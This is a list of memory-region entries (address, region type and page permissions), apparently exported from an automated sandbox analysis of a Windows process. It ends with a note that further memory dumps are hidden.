FDC000
heap
page read and write
6690000
trusted library allocation
page read and write
CFFFBFE000
unkown
page readonly
51BF000
stack
page read and write
D8B000
trusted library allocation
page execute and read and write
3120000
heap
page read and write
C30000
heap
page read and write
5190000
trusted library allocation
page read and write
1FA9655A000
heap
page read and write
21681D6D000
trusted library allocation
page read and write
2BEF000
stack
page read and write
CFFFFFE000
unkown
page readonly
E7C000
heap
page read and write
399E000
stack
page read and write
24E1A100000
trusted library allocation
page read and write
21681B18000
trusted library allocation
page read and write
1FA9659A000
heap
page read and write
1163000
trusted library allocation
page execute and read and write
7FFD34820000
trusted library allocation
page execute and read and write
24E14A73000
heap
page read and write
536D000
stack
page read and write
6692000
trusted library allocation
page read and write
C698B0E000
stack
page read and write
11CE000
stack
page read and write
293A000
trusted library allocation
page execute and read and write
24E1A300000
heap
page read and write
6674000
trusted library allocation
page read and write
1FA9657E000
heap
page read and write
216F7922000
heap
page read and write
C30000
heap
page read and write
7FFD34970000
trusted library allocation
page read and write
CF8057E000
stack
page read and write
CF810FE000
unkown
page readonly
F5C000
heap
page read and write
7FFD34A10000
trusted library allocation
page read and write
F38000
heap
page read and write
10CB000
stack
page read and write
216F7750000
heap
page read and write
CF8017E000
stack
page read and write
889F2FF000
stack
page read and write
1FA96795000
heap
page read and write
5D0000
unkown
page readonly
CF800FE000
unkown
page readonly
DF8000
heap
page read and write
24E1A150000
remote allocation
page read and write
1FA965B6000
heap
page read and write
1FA96557000
heap
page read and write
24E14AB0000
heap
page read and write
7FFD34816000
trusted library allocation
page read and write
216F58D0000
trusted library allocation
page read and write
C62000
trusted library allocation
page read and write
546F000
stack
page read and write
24E1A290000
heap
page read and write
1FA9657C000
heap
page read and write
522D000
stack
page read and write
1FA9654C000
heap
page read and write
5142000
trusted library allocation
page read and write
28F2000
trusted library allocation
page read and write
1174000
trusted library allocation
page read and write
C7B000
trusted library allocation
page execute and read and write
CFFF7FE000
unkown
page readonly
31F0000
heap
page read and write
21681600000
trusted library allocation
page read and write
3BF5000
trusted library allocation
page read and write
D64000
trusted library allocation
page read and write
AF6000
stack
page read and write
7FFD34763000
trusted library allocation
page execute and read and write
216F5893000
trusted library allocation
page read and write
24E14A7B000
heap
page read and write
216F56FD000
heap
page read and write
D1D000
stack
page read and write
71A000
stack
page read and write
7FFD34AB0000
trusted library allocation
page read and write
C60000
trusted library allocation
page read and write
21681B65000
trusted library allocation
page read and write
216F5915000
heap
page read and write
7FFD34911000
trusted library allocation
page read and write
216F5890000
trusted library allocation
page read and write
24E1A2BF000
heap
page read and write
61AE000
stack
page read and write
7FFD34980000
trusted library allocation
page read and write
112A000
trusted library allocation
page read and write
5130000
heap
page execute and read and write
24E19FE0000
trusted library allocation
page read and write
2D0F000
trusted library allocation
page read and write
F70000
heap
page read and write
1738000
heap
page read and write
1140000
heap
page read and write
24E14A5B000
heap
page read and write
2860000
heap
page execute and read and write
2B7D000
trusted library allocation
page read and write
6647000
trusted library allocation
page read and write
21680233000
trusted library allocation
page read and write
1FA965D6000
heap
page read and write
216F5670000
heap
page read and write
2B66000
trusted library allocation
page read and write
889EEFE000
stack
page read and write
C6A000
trusted library allocation
page execute and read and write
24E1A22C000
heap
page read and write
C66000
trusted library allocation
page execute and read and write
24E14A00000
heap
page read and write
3C5E000
stack
page read and write
1730000
heap
page read and write
C77000
trusted library allocation
page execute and read and write
EDB000
heap
page read and write
6660000
trusted library allocation
page read and write
216F78F0000
heap
page execute and read and write
631000
unkown
page readonly
168E000
stack
page read and write
66A0000
trusted library allocation
page read and write
C697CF8000
stack
page read and write
1FA9655B000
heap
page read and write
C697BFD000
stack
page read and write
24E14A79000
heap
page read and write
3AF7000
trusted library allocation
page read and write
50E0000
trusted library section
page read and write
7FFD34A00000
trusted library allocation
page read and write
54EE000
stack
page read and write
5F7E000
stack
page read and write
24E14A13000
heap
page read and write
3B01000
trusted library allocation
page read and write
216F55D0000
heap
page read and write
3E9F000
stack
page read and write
E61000
heap
page read and write
5015000
trusted library allocation
page read and write
4FC0000
trusted library section
page read and write
780000
heap
page read and write
1009000
heap
page read and write
51C4000
trusted library allocation
page read and write
4FD6000
trusted library section
page read and write
529E000
stack
page read and write
2C1F000
trusted library allocation
page read and write
1FA965D4000
heap
page read and write
CFFF4F7000
stack
page read and write
5140000
trusted library allocation
page read and write
1FA964B0000
heap
page read and write
C40000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
C69813C000
stack
page read and write
21681C69000
trusted library allocation
page read and write
519D000
trusted library allocation
page read and write
1136000
trusted library allocation
page read and write
3B1E000
stack
page read and write
24E1A0E0000
trusted library allocation
page read and write
CFFEF7C000
stack
page read and write
7FFD34846000
trusted library allocation
page execute and read and write
606E000
stack
page read and write
7FFD34880000
trusted library allocation
page execute and read and write
5195000
trusted library allocation
page read and write
2D09000
trusted library allocation
page read and write
2970000
trusted library allocation
page execute and read and write
5040000
trusted library allocation
page read and write
24E14AA6000
heap
page read and write
216F56B3000
heap
page read and write
24E15170000
trusted library section
page read and write
3A71000
trusted library allocation
page read and write
1FA9659A000
heap
page read and write
7FFD34A50000
trusted library allocation
page read and write
216F56F9000
heap
page read and write
294B000
trusted library allocation
page execute and read and write
3B1E000
trusted library allocation
page read and write
4B7E000
stack
page read and write
24E1A150000
remote allocation
page read and write
C697EB9000
stack
page read and write
C698B8D000
stack
page read and write
3A81000
trusted library allocation
page read and write
5180000
trusted library allocation
page read and write
E20000
heap
page read and write
64AE000
stack
page read and write
24E15840000
trusted library allocation
page read and write
5127000
trusted library allocation
page read and write
CF807FC000
stack
page read and write
2940000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
24E15300000
heap
page read and write
2D1B000
trusted library allocation
page read and write
2BB1000
trusted library allocation
page read and write
3B0D000
trusted library allocation
page read and write
3ADE000
stack
page read and write
664C000
trusted library allocation
page read and write
1FA96557000
heap
page read and write
216815F6000
trusted library allocation
page read and write
7B0000
unkown
page readonly
54AE000
stack
page read and write
216F7270000
heap
page read and write
559E000
stack
page read and write
E93000
heap
page read and write
DEE000
stack
page read and write
111B000
trusted library allocation
page read and write
CF801FE000
unkown
page readonly
3BF1000
trusted library allocation
page read and write
C36000
heap
page read and write
7FFD3481C000
trusted library allocation
page execute and read and write
C6976F3000
stack
page read and write
24E19FA0000
trusted library allocation
page read and write
5144000
trusted library allocation
page read and write
5D2E000
stack
page read and write
2BC1000
trusted library allocation
page read and write
216F7940000
heap
page read and write
532E000
stack
page read and write
3A9A000
trusted library allocation
page read and write
216F5679000
heap
page read and write
CFFFDFE000
unkown
page readonly
F2E000
stack
page read and write
2936000
trusted library allocation
page execute and read and write
CF8107E000
stack
page read and write
E4C000
heap
page read and write
4B6E000
stack
page read and write
1FA96583000
heap
page read and write
24E1A080000
trusted library allocation
page read and write
889F6FF000
stack
page read and write
5050000
trusted library allocation
page read and write
4FD4000
trusted library section
page read and write
24E14A95000
heap
page read and write
24E14B02000
heap
page read and write
2BF1000
trusted library allocation
page read and write
C697AFC000
stack
page read and write
583E000
stack
page read and write
552E000
stack
page read and write
7FFD34762000
trusted library allocation
page read and write
5175000
trusted library allocation
page read and write
6737000
trusted library allocation
page read and write
2BB9000
trusted library allocation
page read and write
2CE4000
trusted library allocation
page read and write
CF804FE000
unkown
page readonly
7FFD34A80000
trusted library allocation
page read and write
24E1A2C7000
heap
page read and write
C697C7D000
stack
page read and write
1FA9659A000
heap
page read and write
1FA96568000
heap
page read and write
6695000
trusted library allocation
page read and write
24E19F30000
trusted library allocation
page read and write
216F79A0000
heap
page read and write
9A0000
heap
page read and write
3D5F000
stack
page read and write
1FA9659A000
heap
page read and write
2980000
trusted library allocation
page read and write
24E15313000
heap
page read and write
6750000
trusted library allocation
page read and write
2169000F000
trusted library allocation
page read and write
3A94000
trusted library allocation
page read and write
CFFFCF9000
stack
page read and write
EEF000
stack
page read and write
CFFFEFB000
stack
page read and write
CFFF6FE000
stack
page read and write
7FFD349C0000
trusted library allocation
page read and write
AF7000
stack
page read and write
EF5000
heap
page read and write
24E1531A000
heap
page read and write
24E1A00E000
trusted library allocation
page read and write
F2E000
stack
page read and write
E10000
trusted library allocation
page read and write
21681C63000
trusted library allocation
page read and write
29A0000
heap
page execute and read and write
4FC0000
heap
page read and write
2CBD000
trusted library allocation
page read and write
C44000
trusted library allocation
page read and write
2916000
trusted library allocation
page read and write
1FA96580000
heap
page read and write
1110000
trusted library allocation
page read and write
1122000
trusted library allocation
page read and write
FE0000
trusted library allocation
page read and write
5049000
trusted library allocation
page read and write
CFFF9FE000
unkown
page readonly
C697F3E000
stack
page read and write
24E19FF0000
trusted library allocation
page read and write
DF0000
heap
page read and write
24E1A2FA000
heap
page read and write
216F5850000
heap
page readonly
C697B7F000
stack
page read and write
2947000
trusted library allocation
page execute and read and write
889F4FE000
stack
page read and write
1FA965B9000
heap
page read and write
216F7770000
heap
page read and write
2830000
heap
page read and write
EF7000
heap
page read and write
1FA96557000
heap
page read and write
1FA96581000
heap
page read and write
E28000
heap
page read and write
21681C6F000
trusted library allocation
page read and write
1FA96530000
heap
page read and write
7FFD34950000
trusted library allocation
page execute and read and write
CFFFAFB000
stack
page read and write
D5D000
trusted library allocation
page execute and read and write
2BC5000
trusted library allocation
page read and write
216F5650000
trusted library allocation
page read and write
16CE000
stack
page read and write
216F7400000
heap
page read and write
24E1A0F0000
trusted library allocation
page read and write
51E0000
heap
page execute and read and write
27DD000
stack
page read and write
2C3F000
trusted library allocation
page read and write
5188000
trusted library allocation
page read and write
535E000
stack
page read and write
D20000
heap
page read and write
D54000
trusted library allocation
page read and write
1FA965AD000
heap
page read and write
51F0000
trusted library allocation
page read and write
CF805FE000
unkown
page readonly
1FA96568000
heap
page read and write
7FFD349B0000
trusted library allocation
page read and write
24E14AB6000
heap
page read and write
1FA965D0000
heap
page read and write
290E000
trusted library allocation
page read and write
E0E000
heap
page read and write
1FA9656E000
heap
page read and write
F66000
heap
page read and write
2D7B000
trusted library allocation
page read and write
6740000
trusted library allocation
page read and write
7B2000
unkown
page readonly
5D2000
unkown
page readonly
216901B0000
trusted library allocation
page read and write
D87000
trusted library allocation
page execute and read and write
21681C66000
trusted library allocation
page read and write
24E1A080000
trusted library allocation
page read and write
7FFD349E0000
trusted library allocation
page read and write
5C2E000
stack
page read and write
216F72A7000
heap
page read and write
2CDB000
trusted library allocation
page read and write
2925000
trusted library allocation
page read and write
3B2C000
trusted library allocation
page read and write
1154000
trusted library allocation
page read and write
24E1A2E6000
heap
page read and write
663E000
trusted library allocation
page read and write
CF8027E000
stack
page read and write
515E000
trusted library allocation
page read and write
3A97000
trusted library allocation
page read and write
5120000
trusted library allocation
page read and write
21681B5C000
trusted library allocation
page read and write
2A7E000
stack
page read and write
1FA96555000
heap
page read and write
7CE000
stack
page read and write
6650000
trusted library allocation
page execute and read and write
5F6E000
stack
page read and write
2911000
trusted library allocation
page read and write
216F7210000
heap
page read and write
504E000
trusted library allocation
page read and write
24E14A7D000
heap
page read and write
24E1A110000
trusted library allocation
page read and write
2960000
trusted library allocation
page read and write
F30000
trusted library allocation
page read and write
24E15160000
trusted library allocation
page read and write
501D000
trusted library allocation
page read and write
CF8047E000
stack
page read and write
7FFD3476D000
trusted library allocation
page execute and read and write
5518000
heap
page read and write
DF0000
trusted library allocation
page execute and read and write
7FFD34A70000
trusted library allocation
page read and write
EB4000
heap
page read and write
24E1A2F2000
heap
page read and write
1FA96568000
heap
page read and write
28F4000
trusted library allocation
page read and write
D3F000
stack
page read and write
21681AD4000
trusted library allocation
page read and write
3ADC000
trusted library allocation
page read and write
2BE8000
trusted library allocation
page read and write
6760000
trusted library allocation
page execute and read and write
24E1A21F000
heap
page read and write
4EB0000
heap
page read and write
7FFD34900000
trusted library allocation
page read and write
2BC9000
trusted library allocation
page read and write
29EE000
stack
page read and write
1FA9659A000
heap
page read and write
7FFD34A40000
trusted library allocation
page read and write
2A40000
trusted library allocation
page read and write
556E000
stack
page read and write
F60000
trusted library allocation
page execute and read and write
2B2F000
trusted library allocation
page read and write
24E149D0000
heap
page read and write
216F5761000
heap
page read and write
216F7215000
heap
page read and write
F57000
heap
page read and write
24E14AA0000
heap
page read and write
2ACD000
stack
page read and write
400000
remote allocation
page execute and read and write
C697A7F000
stack
page read and write
2970000
heap
page execute and read and write
216F56CE000
heap
page read and write
There are 697 hidden memdumps, click here to show them.